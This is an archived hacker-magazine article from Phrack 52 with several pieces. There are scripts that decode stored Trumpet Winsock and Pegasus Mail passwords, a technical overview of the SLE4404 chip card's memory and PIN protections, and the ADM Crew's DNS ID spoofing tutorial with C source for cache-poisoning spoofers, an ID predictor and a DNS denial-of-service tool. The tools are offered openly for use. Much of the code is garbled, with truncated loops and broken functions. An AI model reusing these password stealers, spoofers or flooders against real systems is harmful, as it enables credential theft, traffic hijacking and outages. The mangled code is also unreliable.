---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 03 of 20
-------------------------[ P H R A C K 5 2 L I N E N O I S E
--------[ Various
0x1>-------------------------------------------------------------------------
Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I felt obligated to share a small piece of code that I don't like to admit that I created, far earlier than the esteemed Jeep's published work. As his requires access to a Pascal compiler and does not seem to be coded with portability in mind, the fact that my script requires Trumpet itself to run does not seem too great a hindrance. The irony is that not only is the "cipher" a simple obfuscating XOR, but that Trumpet itself will decode it for you.
<++> password.cmd
Put in Trumpet Winsock directory, run under "Dialer/Other"
Cannot currently use any file other than trumpwsk.ini,
apparently due to implementation errors in the "load" function
display \n display "Trumpet Password Thief 1.0, 8-18-95"\n display \n if [load $username] display "username: " display $username\n else display "ERR: cannot load username"\n end if [load $password] display "password: " display $password\n else display "ERR: cannot load password"\n end display \n <-->
- anonymous
0x2>-------------------------------------------------------------------------
Another password decoder for ya... written long ago, I just never bothered to release it...
<++> peg-dec.c /* * Pegasus Mail Password Decoder v1.0 by Belgorath */
include
/* Decoding/Encoding Tables */ int dec1[1]= { 44 }; int dec2[2]= { 16, 21 }; int dec3[3]= { 10, 22, 28 }; int dec4[4]= { 37, 28, 21, 7 }; int dec5[5]= { 21, 22, 37, 28, 9 }; int dec6[6]= { 22, 15, 28, 42, 17, 2 }; int dec7[7]= { 15, 17, 21, 31, 0, 12, 19 }; int dec8[8]= { 9, 2, 7, 20, 44, 22, 28, 23 };
int *decz[8] = { dec1,dec2,dec3,dec4,dec5,dec6,dec7,dec8 };
int decode_char(int numch, int ch, int pos) { ch-=decz[numch-1][pos-1]; if(ch<-127) ch+=256; return ch; } void main(void) { int zz,x,nc; char *tz; int inps[20];
nc=0; tz=malloc(8192); printf("Enter Pegasus Mail Password: "); gets(tz);
/* Fun input parsing loop. Hope your malloc bzero's... */
while( *tz ) {
for(x=0;x /* Throw away anything past the end */
for(x=0;x /* All pegasus passwords end in -1 */
if(inps[nc-1]!=-1) {
printf("Invalid Pegasus Mail Password.\n");
return;
} /* But we throw it away anyway */
nc--; printf("Decoded Password: [");
for(x=1;x 0x3>------------------------------------------------------------------------- Chip cards differ from one another in memory size, type of memory (PROM or
EEPROM), security logic and micro-controller. This article will discuss the
Siemens SLE4404 chip card technology. The SLE4404 is employed for electronic purse cards and bank transactions,
cellular telephony (pre-payed cards), user IDs for access control, etc. (some
examples: SmartCard, ViaCard and Italian Bancomat). Its data can be accessed
through a simple TTL serial channel, providing a +5 Vcc power supply from an
external source. Inside the chip
~~~~~~~~~~~~~~~
The chipcard has at its disposal EEPROM memory consisting of a 416-bit matrix
(each row is 16-bits) that is protected by security logic providing access
control. This is the logic diagram: C3,C8,C2,C5 --> | Control & | | Row | | User mem 208 bit |
C1 (Vcc) --> | Security | | Decoder | --> | Sec unit 192 bit |
C7 (I/O) <--> | Logic | | | 26 | Special mem unit |
+-----------+ +---------+ +------------------+
^ ^
| |
+----------------------------------+ The SLE4404 memory is subdivided in three main memory blocks: one is read
only (a "PROM" containing the manufacturer code and/or a serial number and
an expiration date), the second is both readable and writeable (user memory)
and the last block cannot be written to unless the lock-out fuse has been
fused. This is the memory map: BLOCK TYPE SIZE (BIT) ADDRESS READABLE WRITEABLE ERASEABLE Manufacturer code 16 0-15 Yes No No
Application ROM 48 16-63 Yes No No
User code 16 64-79 [fuse] U.C. U.C.
Error counter 4 80-83 Yes Yes U.C.
EEPROM #1 12 84-95 Yes Yes U.C.
EEPROM #2 16 96-111 Yes U.C. U.C.
Frame memory block
- F.M. config 2 112-113 Yes Yes U.C./R.C.
- Frame memory 206 114-319 [cfg] [cfg] U.C./R.C.
Frame code 32 320-351 [fuse] [fuse] [cfg] Meaning of abbreviations: U.C. - User code required
(each time the code is entered the error counter is decreased)
R.C. - Frame code required
(each time the code is entered the frame counter is decreased)
[fuse] - Operation allowed ONLY IF lock-out fuse is not fused
[cfg] - Operation allowed according to frame memory configuration Frame memory configuration table: BIT 112 BIT 113 MEMORY MODE READABLE WRITEABLE The first 16-bit block is for the Manufacturer Code. The following 48-bit
block is called Application ROM, containing another code (Manufacturer sub
code or info, serial number, sub-type of card, etc). The User Code is the access code (PIN) used to read/write/erase memory. Please note that access to memory is blocked after four incorrect access
trials (checked by the counter). The same is for the Frame Code and the
Frame [error] Counter (note that the number of incorrect accesses is limited
to three trials instead of four). Finally, the Frame Memory is generally used for storing personal user
information or the credit limit (money that can be fetched in a bank
transaction, or the remaining "virtual" credit that a pre-payed cellular card
contains). The Pin-out
~~~~~~~~~~~
This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected): +-------+-------------------+
| C 1 | C 5 | Contact Pin Info
| | |
+-------+ +-------+ 1 6 Vcc +5V
| C 2 | | C 6 | 2 5 Reset
| | | | 3 4 Clock
+-------+ +-------+ 4 3 Test input - N.C.
| C 3 | | C 7 | 5 8 Ground
| | | | 6 7 N.C.
+-------+ +-------+ 7 1 Bi-directional I/O data line
| C 4 | | C 8 | 8 2 Control input (data change)
| | | |
+-------+-----------+-------+ 0x4>-------------------------------------------------------------------------
_ _ _ _
/ \ | _ \ | \ / |
| / \ | | | \ | | _/ |
| |_| | | | / | | _/ |
..oO THE | --- | | / | | | | CreW Oo..
''' ''' ''''''' '''' '''' --[1]-- DNS ID Hacking Presentation You might be wondering what DNS ID Hacking (or Spoofing) is all about. DNS ID
Hacking isn't a usual way of hacking/spoofing such jizz or any-erect. This
method is based on a vulnerability on DNS Protocol. More brutal, the DNS ID
hack/spoof is very efficient and very strong as there is no generation of DNS
daemons that escapes from it (even WinNT!). --[1.1]-- DNS Protocol mechanism explanation In the first step, you must know how the DNS works. I will only explain the
most important facts of this protocol. In order to do that, we will follow
the way of a DNS request packet from A to Z! Name resolution example:
The client (bla.bibi.com) sends a request of resolution of the domain
"www.heike.com". To resolve the name, bla.bibi.com uses "dns.bibi.com" for
DNS. Let's take a look at the following picture.. /---------------------------------\
| 111.1.2.123 = bla.bibi.com |
| 111.1.2.222 = dns.bibi.com |
| format: |
| IPADDR:PORT->IPADDR:PORT |
| ex: |
| 111.1.2.123:2999->111.1.2.222:53|
---------------------------------/
...
gethosbyname("www.heike.com");
... [bla.bibi.com] [dns.bibi.com]
111.1.2.123:1999 ---> [?www.heike.com] ------> 111.1.2.222:53 Here we see our resolution name request from source port 1999 which is asking
to DNS on port 53 (note: DNS is always on port 53). Now that dns.bibi.com has
received the resolution request from bla.bibi.com, dns.bibi.com will have to
resolve the name: [dns.bibi.com] [ns.internic.net]
111.1.2.222:53 --------> [dns?www.heike.com] ----> 198.41.0.4:53 dns.bibi.com asks ns.internic.net who the root name server for the address
of www.heike.com is, and if it doesn't have it and sends the request to a name
server which has authority on '.com' domains (note: we send a request to the
Internic because it could have this request in its cache). [ns.internic.net] [ns.bibi.com]
198.41.0.4:53 ------> [ns for.com is 144.44.44.4] ------> 111.1.2.222:53 Here we can see that ns.internic.net answered to ns.bibi.com (which is the DNS
that has authority over the domain bibi.com), that the name server of for.com
has the IP 144.44.44.4 (let's call it ns.for.com). Now our ns.bibi.com will
ask to ns.for.com for the address of www.heike.com, but this one doesn't have
it and will forward the request to the DNS of heike.com which has authority
for heike.com. [ns.bibi.com] [ns.for.com]
111.1.2.222:53 ------> [?www.heike.com] -----> 144.44.44.4:53 The answer from ns.for.com: [ns.for.com] [ns.bibi.com]
144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4] ---> 144.44.44.4:53 Now that we know which IP address has authority on the domain "heike.com"
(we'll call it ns.heike.com), we ask it what's the IP of the machine
www.heike.com. [ns.bibi.com] [ns.heike.com]
111.1.2.222:53 -----> [?www.heike.com] ----> 31.33.7.4:53 We now have our answer: [ns.heike.com] [ns.bibi.com]
31.33.7.4:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.222:53 Great we have the answer, we can forward it to our client bla.bibi.com. [ns.bibi.com] [bla.bibi.com]
111.1.2.222:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.123:1999 Now bla.bibi.com knows the IP of www.heike.com. Now let's imagine that we'd like to have the name of a machine from its IP, in
order to do that, we proceed a bit differently as the IP will have to be
transformed. Reverse name lookup resolution:
100.20.40.3 will become 3.40.20.100.in-addr.arpa This method is only for the IP resolution request (reverse DNS). Let's look at a practical example of when we take the IP address of
www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation
into a comprehensible format by DNS). ...
gethostbyaddr("31.33.7.44");
... We send our request to ns.bibi.com: [bla.bibi.com] [ns.bibi.com]
111.1.2.123:2600 -----> [?44.7.33.31.in-addr.arpa] -----> 111.1.2.222:53 Which is forwarded to ns.internic.net: [ns.bibi.com] [ns.internic.net]
111.1.2.222:53 -----> [?44.7.33.31.in-addr.arpa] ------> 198.41.0.4:53 ns.internic.net will send the IP of a name server which has authority on
'31.in-addr.arpa'. [ns.internic.net] [ns.bibi.com]
198.41.0.4:53 --> [DNS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53 Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4: [ns.bibi.com] [ns.for.com]
111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53 And so on. The mechanism is nearly the same that was used for name resolution. --[1.2]-- DNS packet header Here is the format of a DNS message :
+---------------------------+---------------------------+
| ID (the famous :) | flags |
+---------------------------+---------------------------+
| numbers of questions | numbers of answer |
+---------------------------+---------------------------+
| number of RR authority |number of supplementary RR |
+---------------------------+---------------------------+
| |
\ \
\ QUESTION \
| |
+-------------------------------------------------------+
| |
\ \
\ ANSWER \
| |
+-------------------------------------------------------+
| |
\ \
\ Stuff etc.. No matter \
| |
+-------------------------------------------------------+ --[1.3]-- Structure of DNS packets. ID The ID permits us to identify each DNS packet, since exchanges between name
servers are from port 53 to port 53, and more it might be more than one
request at a time, so the ID is the only way to recognize the different DNS
requests. Well talk about it later.. flags The flags area is divided into several parts : [QR | opcode | AA| TC| RD| RA | zero | rcode ]
|
| |||| |_ 4 bits
| | 1 bit
|
1 bit QR = If the QR bit = 0, it means that the packet is a question, otherwise
it's an answer. opcode = If the value is 0 for a normal request, 1 for a reserve request, and
2 for a status request (we don't need to know all these modes). AA = If it's equal to 1, it says that the name server has an authoritative
answer. TC = No matter RD = If this flag is to 1, it means "Recursion Request", for example when
bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the
DNS to assume this request. RA = If it's set to 1, it means that recursion is available. This bit is
set to 1 in the answer of the name server if it supports recursion. Zero = Here are three zeroes... rcode = It contains the return error messages for DNS requests if 0, it means
"no error", 3 means "name error" The 2 following flags don't have any importance for us. DNS QUESTION: Here is the format of a DNS question : +-----------------------------------------------------------------------+
| name of the question |
+-----------------------------------------------------------------------+
| type of question | type of query |
+--------------------------------+--------------------------------------+ The structure of the question is like this. example:
www.heike.com will be [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]
for an IP address, the format remains the same. 44.33.88.123.in-addr.arpa would be:
[2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]
[note]: a compression format exists, but we won't cover it. type of question: Here are the values that we will use much of the time (there are many more,
but these are only ones relevant): name value
A | 1 | IP Address (resolving a name to an IP)
PTR | 12 | Pointer (resolving an IP to a name) type of query: The values are the same as the type of question. DNS ANSWER: Here is the format of an answer (an RR) +------------------------------------------------------------------------+
| name of the domain |
+------------------------------------------------------------------------+
| type | class |
+----------------------------------+-------------------------------------+
| TTL (time to live) |
+------------------------------------------------------------------------+
| resource data length | |
|----------------------------+ |
| resource data |
+------------------------------------------------------------------------- name of the domain: The name of the domain in reports to the following resource: The domain name
is stored in the same way that the part question for the resolution request of
www.heike.com, the flag "name of the domain" will contain
[3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]. type: The type flag is the same than "type of query" in the question part of the
packet. class:
The class flag is equal to 1 for Internet data. time to live:
This flag explains in seconds the time-life of the information into the
name server cache. resource data length:
The length of resource data, for example if resource data length is 4, it
means that the data in resources data are 4 bytes long. resource data: I will offer you a little example that explains this better: Here is what's happening when ns.bibi.com asks ns.heike.com for
www.heike.com's address ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53 (Phear Heike ;) +---------------------------------+--------------------------------------+
| ID = 1999 | QR = 0 opcode = 0 RD = 1 |
+---------------------------------+--------------------------------------+
| numbers of questions = htons(1) | numbers of answers = 0 |
+---------------------------------+--------------------------------------+
| number of RR authoritative = 0 | number of supplementary RR = 0 |
+---------------------------------+--------------------------------------+
here is for the question. now let's stare the answer of ns.heike.com ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53 +---------------------------------+---------------------------------------+
| ID = 1999 | QR=1 opcode=0 RD=1 AA =1 RA=1 |
+---------------------------------+---------------------------------------+
| numbers of questions = htons(1) | numbers of answers = htons(1) |
+---------------------------------+---------------------------------------+
| number of RR authoritative = 0 | number of supplementary RR = 0 |
+---------------------------------+---------------------------------------+
+-------------------------------------------------------------------------+
| name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+-------------------------------------------------------------------------+
| type of question = htons(1) | type of query = htons(1) |
+-------------------------------------------------------------------------+
+-------------------------------------------------------------------------+
| name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+-------------------------------------------------------------------------+
| type = htons(1) | class = htons(1) |
+-------------------------------------------------------------------------+
| time to live = 999999 |
+-------------------------------------------------------------------------+
| resource data length = htons(4) | resource data=inet_addr("31.33.7.44") |
+-------------------------------------------------------------------------+ Yah! That's all for now :)) Here is an analysis:
In the answer QR = 1 because it's an answer :)
AA = 1 because the name server has authority in its domain
RA = 1 because recursion is available Good =) I hope you understood that cause you will need it for the following
events. --[2.0]-- DNS ID hack/spoof Now it's time to explain clearly what DNS ID hacking/spoofing is.
Like I explained before, the only way for the DNS daemon to recognize
the different questions/answers is the ID flag in the packet. Look at this
example: ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53 So you only have to spoof the ip of ns.heike.com and answer your false
information before ns.heike.com to ns.bibi.com! ns.bibi.com <------- . . . . . . . . . . . ns.heike.com
|
|<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com But in practice you have to guess the good ID :) If you are on a LAN, you
can sniff to get this ID and answer before the name server (it's easy on a
Local Network :) If you want to do this remotely you don't have a lot a choices, you only
have 4 basics methods: 1.) Randomly test all the possible values of the ID flag. You must answer
before the ns ! (ns.heike.com in this example). This method is obsolete
unless you want to know the ID .. or any other favorable condition to
its prediction. 2.) Send some DNS requests (200 or 300) in order to increase the chances
of falling on the good ID. 3.) Flood the DNS in order to avoid its work. The name server will crash
and show the following error! 4.) Or you can use the vulnerability in BIND discovered by SNI (Secure
Networks, Inc.) with ID prediction (we will discuss this in a bit). I found a heavy vulnerability in Windows 95 (I haven't tested it on
WinNT), lets imagine my little friend that's on Windows 95.
Windows ID's are extremely easy to predict because it's "1" by default :)))
and "2" for the second question (if they are 2 questions at the same time). There is a vulnerability in BIND (discovered by SNI as stated earlier).
In fact, DNS IS are easily predictable, you only have to sniff a DNS in
order to do what you want. Let me explain... The DNS uses a random ID at the beginning but it only increase this ID for
next questions ... =))) It's easy to exploit this vulnerability.
Here is the way: Be able to sniff easily the messages that comes to a random DNS (ex.
ns.dede.com for this sample). You ask NS.victim.com to resolve (random).dede.com. NS.victim.com will
ask to ns.dede.com to resolve (random).dede.com ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com Now you have the ID of the message from NS.victim.com, now you know what
ID area you'll have to use. (ID = 444 in this sample). You then make your resolution request. ex. www.microsoft.com to
NS.victim.com (you) ---> [?www.microsoft.com] ---> ns.victim.com ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com Flood the name server ns.victim.com with the ID (444) you already have and
then you increase this one. ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com (now you know that DNS IDs are predictable, and they only increase. You
flood ns.victim.com with spoofed answers with the ID 444+ ;) * ADMsnOOfID does this. There is another way to exploit this vulnerability without a root on
any DNS The mechanism is very simple. Here is the explanation We send to ns.victim.com a resolution request for *.provnet.fr (you) ----------[?(random).provnet.fr] -------> ns.victim.com Then, ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr.
There is nothing new here, but the interesting part begins here. From this point you begin to flood ns.victim.com with spoofed answers
(with ns1.provnet.fr IP) with ids from 100 to 110... (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com
..... After that, we ask ns.victim.com if (random).provnet.fr has an IP. If ns.victim.com give us an IP for (random).provnet.fr then we have
found the correct ID :) Otherwise we have to repeat this attack until we
find the ID. It's a bit long but it's effective. And nothing forbids you
to do this with friends ;) This is how ADMnOg00d works ;) Here you will find 5 programs
ADMkillDNS - very simple DNS spoofer
ADMsniffID - sniff a LAN and reply false DNS answers before the NS
ADMsnOOfID - a DNS ID spoofer (you'll need to be root on a NS)
ADMnOg00d - a DNS ID predictor (no need to be root on a NS)
ADNdnsfuckr - a very simple denial of service attack to disable DNS Have fun!! :)
Note: You can find source and binaries of this progs at
ftp.janova.org/pub/ADM. I'm going to make a little HOWTO soon, which would
be on janova. You need to install libpcap on your machine before any
compilation of the ADMID proggies :) ADM Crew. Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love
these guys)
Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at
www.secnet.com for finding the vulnerability =) <++> ADMIDpack/ADM-spoof.c
/***********************/
/ ADM spoofing routine for spoof udp /
/***********************/ /************************/
/
* in_cksum --
* Checksum routine for Internet Protocol family headers (C Version)
/
/************************/ unsigned short incksum(addr, len)
ushort *addr;
int len;
{
register int nleft = len;
register ushort *w = addr;
register int sum = 0;
ushort answer = 0; } int udp_send(s,saddr,daddr,sport,dport,datagram,datasize) { struct sockaddr_in sin;
struct iphdr *ip;
struct udphdr *udp;
unsigned char *data;
unsigned char packet[4024];
int x; ip = (struct iphdr *)packet;
udp = (struct udphdr *)(packet+IPHDRSIZE);
data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE); memset(packet,0,sizeof(packet)); return(x);
} /************************/
/ RECV PAKET /
/ get_pkt(socket, buffer , size of the buffer); */
/************************/ int getpkt(s,data,size)
int s;
unsigned char *data;
int size;
{
struct sockaddrin sin;
int len,resu;
len= sizeof(sin);
resu=recvfrom(s,data,size,0,(struct sockaddr )&sin,&len);
return resu;
} int myrand()
{
int j;
j=1+(int) (150.0*rand()/(RAND_MAX+1.0));
return(j);
} unsigned long host2ip(char *serv) {
struct sockaddr_in sinn;
struct hostent *hent; hent=gethostbyname(serv);
if(hent == NULL) return 0;
bzero((char *)&sinn, sizeof(sinn));
bcopy(hent->haddr, (char *)&sinn.sinaddr, hent->hlength);
return sinn.sinaddr.s_addr;
} void nameformat(char name,char *QS)
{
/ CRAP & LAme COde :) */
char lol[3000];
char tmp[2550];
char tmp2[2550];
int i,a=0;
bzero(lol,sizeof(lol));
bzero(tmp,sizeof(tmp));
bzero(tmp2,sizeof(tmp2)); for(i=0;i sprintf(tmp2,"%c%s",a,tmp);
strcat(lol,tmp2);
strcpy(QS,lol);
} void nameformatIP(char *ip, char *resu)
{
char *arpa = "in-addr.arpa";
char bla[255];
char arf[255];
char haha[255];
char c;
char *A[4];
int i,a=3,k=0; bzero(bla,sizeof(bla));
bzero(arf,sizeof(arf));
bzero(haha,sizeof(haha)); for(i=0;i<4;i++){
A[i] =(char *)malloc(4);
bzero(A[i],4);
} bzero(bla,sizeof(bla));
bzero(arf,sizeof(arf)); for(i=0;i strcat(A[a],arf); for(i=0;i<4;i++){
strcat(bla,A[i]);
strcat(bla,".");
} strcat(bla,arpa);
nameformat(bla,haha);
strcpy(resu,haha);
} int makepaketQS(char *data,char *name,int type)
{ if(type == TYPEA ){
nameformat(name,data);
*( (ushort *) (data+strlen(data)+1) ) = htons(TYPE_A);
} if(type == TYPEPTR){
nameformatIP(name,data);
*( (ushort *) (data+strlen(data)+1) ) = htons(TYPE_PTR);
} *( (u_short *) (data+strlen(data)+3) ) = htons(1);
return(strlen(data)+5); } int makepaketAW(char *data,char *name, char *ip,int type)
{
int i;
char tmp[2550];
bzero(tmp,sizeof(tmp)); if( type == TYPEA ){
nameformat(name,data);
*( (ushort *) (data+strlen(data)+1) ) = htons(1);
*( (ushort *) (data+strlen(data)+3) ) = htons(1); if( type == TYPEPTR ){
nameformat(name,tmp);
nameformatIP(ip,data);
*( (ushort *) (data+strlen(data)+1) ) = htons(TYPEPTR);
*( (ushort *) (data+strlen(data)+3) ) = htons(1); void sendquestion(ulong sip, ulong dip,char *name,int type)
{
struct dnshdr *dns;
char buff[1024];
char *data;
int i;
int on=1;
int sraw; if( (sraw=socket(AFINET,SOCKRAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
} if((setsockopt(sraw, IPPROTOIP, IPHDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTOIP, IPHDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
} dns = (struct dnshdr *) buff;
data = (char *)(buff+DNSHDRSIZE); bzero(buff,sizeof(buff)); dns->id = 6000+myrand();
dns->qr = 0;
dns->rd = 1;
dns->aa = 0;
dns->quenum = htons(1);
dns->repnum = htons(0);
i=makepaketQS(data,name,type);
udpsend(sraw,sip,d_ip,1200+myrand,53,buff,DNSHDRSIZE+i);
close(sraw); void sendawnser(ulong sip, ulong dip, char *name,char *spoofip,int ID,int type)
{
struct dnshdr *dns;
char buff[1024];
char *data;
int i;
int on=1;
int sraw; if( (sraw=socket(AFINET,SOCKRAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
} if((setsockopt(sraw, IPPROTOIP, IPHDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTOIP, IPHDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
} dns = (struct dnshdr *) buff;
data = (char *)(buff+DNSHDRSIZE); bzero(buff,sizeof(buff)); dns->id = htons(ID);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->quenum = htons(1);
dns->repnum = htons(1);
i=makepaketAW(data,name,spoofip,type);
printf(" I apres Makepaket == %i \n",i);
udpsend(sraw,sip,d_ip,53,53,buff,DNSHDRSIZE+i);
close(sraw);
} void dnsspoof(char *dnstrust,char *victim,char *spoofname,char *spoofip,int ID,int type)
{
struct dnshdr *dns;
char buff[1024];
char *data;
ulong fakeip;
ulong trustip;
u_long victimip;
int loop,rere; if( type == TYPE_PTR)
for(loop=0;loop<4;loop++)sendquestion(fakeip,victimip,spoofip,type); if( type == TYPE_A)
for(loop=0;loop<4;loop++)
sendquestion(fakeip,victimip,spoofname,type); <-->
<++> ADMIDpack/ADMdnsfuckr.c
/* ADM DNS DESTROYER */ void main(int argc, char **argv)
{
struct dnshdr *dns;
char *data;
char buffer2[4000];
unsigned char namez[255]; if(argc <2){printf(" usage : %s dns = (struct dnshdr *)buffer2;
data = (char *)(buffer2+12);
bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AFINET,SOCKRAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
} if( (setsockopt(sraw, IPPROTOIP, IPHDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
} printf("ADMdnsFuker %s DNS DESTROYER made by the ADM crew\n",VERSION);
printf("(c) ADM,Heike vouais tous se ki est as moi est a elle aussi ...\n");
sleep(1); sip=host2ip("100.1.2.3");
dip=host2ip(argv[1]); }
<-->
<++> ADMIDpack/ADMkillDNS.c void main(int argc, char **argv)
{ if(argc <5){
system("/usr/bin/clear");
printf(" usage : %s dns = (struct dnshdr *)buffer2;
data = (char *)(buffer2+DNSHDRSIZE);
bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AFINET,SOCKRAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
} if((setsockopt(sraw, IPPROTOIP, IPHDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
} printf("ADMkillDNS %s",VERSION);
printf("\nouais ben mwa je dedie ca a ma Heike");
printf("\nREADY FOR ACTION!\n"); sip2=sip=host2ip(argv[1]);
dip2=dip=host2ip(argv[2]); if(argc>5)if(*argv[5]=='A')
{
for(loop=0;loop<10;loop++){
dns->id = 6000+loop;
dns->qr = 0;
dns->rd = 1;
dns->aa = 0;
dns->quenum = htons(1);
dns->repnum = htons(0);
i=makepaketQS(data,argv[3],TYPEA);
udpsend(sraw,sip,dip,1200+loop,53,buffer2,DNSHDRSIZE+i); } /* end of DNS flood query */ /* ici on trouve la routine contre un DOS */ if(argc>5)if(*argv[5]=='B')
{
sip=host2ip("100.1.2.3");
dns->id = 123;
dns->rd = 1;
dns->quenum = htons(1); if(argc > 6 )idstart = atoi(argv[6]);
else
idstart = IDSTART;
if(argc > 7 )idstop = atoi(argv[7]);
else
idstop = IDSTOP; if(argc > 8 ){
portstart = atoi(argv[8]);
portstop = atoi(argv[9]);
} else {
portstart = PORTSTART;
portstop = PORTSTOP;
} bzero(buffer2,sizeof(buffer2));
bzero(namez,sizeof(namez));
i=0;
x=0;
sip=sip2;
dip=dip2; printf(" terminated..\n");
}
<-->
<++> ADMIDpack/ADMnOg00d.c
/********/
/ ADMnog00d (c) ADM /
/*******/
/ ADM DNS ID PREDICTOR /
/********/ void usage()
{ printf(" ADMnoG00D void senddnspkt(s,dip,wwwname,ip,dns)
int s;
ulong dip;
char *wwwname;
char *ip;
struct dnshdr *dns;
{
struct sockaddrin sin;
int i;
char buffer[1024];
char *data = (char *)(buffer+DNSHDRSIZE);
bzero(buffer,sizeof(buffer));
memcpy(buffer,dns,DNSHDRSIZE); if(dns->qr == 0)
{
i=makepaketQS(data,wwwname,TYPEA);
sin.sinfamily = AFINET;
sin.sinport = htons(53);
sin.sinaddr.saddr = d_ip;
sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
} else
{
i=makepaketAW(data,wwwname,ip,TYPEA);
sin.sinfamily = AFINET;
sin.sinport = htons(53);
sin.sinaddr.saddr = d_ip;
sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
}
} void dnsqsnord(s,dip,wwwname,ID)
int s;
ulong dip;
char *wwwname;
int ID;
{
struct dnshdr *dns;
char *data;
char buffer[1024];
int i; dns = (struct dnshdr *)buffer;
data = (char *)(buffer+DNSHDRSIZE);
bzero(buffer,sizeof(buffer)); } void main(int argc, char **argv)
{
struct sockaddrin sinrcp;
struct dnshdr *dns, *dnsrecv;
char *data, *data2;
char buffer2[4000];
char buffer[4000];
char spoofname[255];
char spoofip[255];
char dnstrust[255];
char bla[255];
char *alacon;
unsigned char fakename[255];
unsigned char namez[255]; dns_recv = (struct dnshdr *)(buffer);
data2 = (char *)(buffer+DNSHDRSIZE);
dns = (struct dnshdr *)buffer2;
data = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2));
srand(time(NULL)); if( (sr=socket(AFINET,SOCKDGRAM,IPPROTOUDP)) == ERROR ){
perror("socket");
exit(ERROR);
} if( (fcntl(sr,FSETFL,O_NONBLOCK)) == ERROR ){
perror("fcntl");
exit(ERROR);
} if ((sraw = socket(AFINET,SOCKRAW,IPPROTO_RAW)) == ERROR ){
perror("socket");
exit(ERROR);
} if( (setsockopt(sraw, IPPROTOIP, IPHDRINCL, (char *)&on, sizeof(on)) == ERROR)){
perror("setsockopt");
exit(ERROR);
} if(argc < 2) usage(); if(argc > 9 )DA_ID = loop = atoi(argv[9]); if(argc > 6)strcpy(spoofname,argv[6]);
else{
printf("enter the name you wanna spoof:");
scanf("%s",spoofname);
} if(argc > 7)strcpy(bla,argv[7]);
else{
printf("enter the ip's of the spoof name:");
scanf("%s",bla);
} alacon =(char *)inet_ntoa(host2ip(bla));
strcpy(spoofip,alacon); if( argc > 8 ) strcpy(bla,argv[8]);
else{
printf("enter the DNS trust of the victim:");
scanf("%s",bla);
} alacon =(char *)inet_ntoa(host2ip(bla));
strcpy(dnstrust,alacon); printf("ADMnoG00d %s\n",VERSION);
printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n");
sleep(1);
printf("\nLets Play =)!!\n"); /* save some param */
sip2 = host2ip(argv[1]);
dip2 = dip = host2ip(argv[4]);
trust = host2ip(argv[2]);
sip = host2ip(UNDASPOOF); while(1){ /* here start the spoof anwser */ ID = loop; for(;loop >= ID-10 ;loop--){
dns->id = htons(loop);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->quenum = htons(1);
dns->repnum = htons(1); bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
bzero(namez,sizeof(namez));
i=0;
x=0; /* time for test spoof */ dnsqsnord(sr,d_ip2,fakename,myrand()); /* here we sending question /
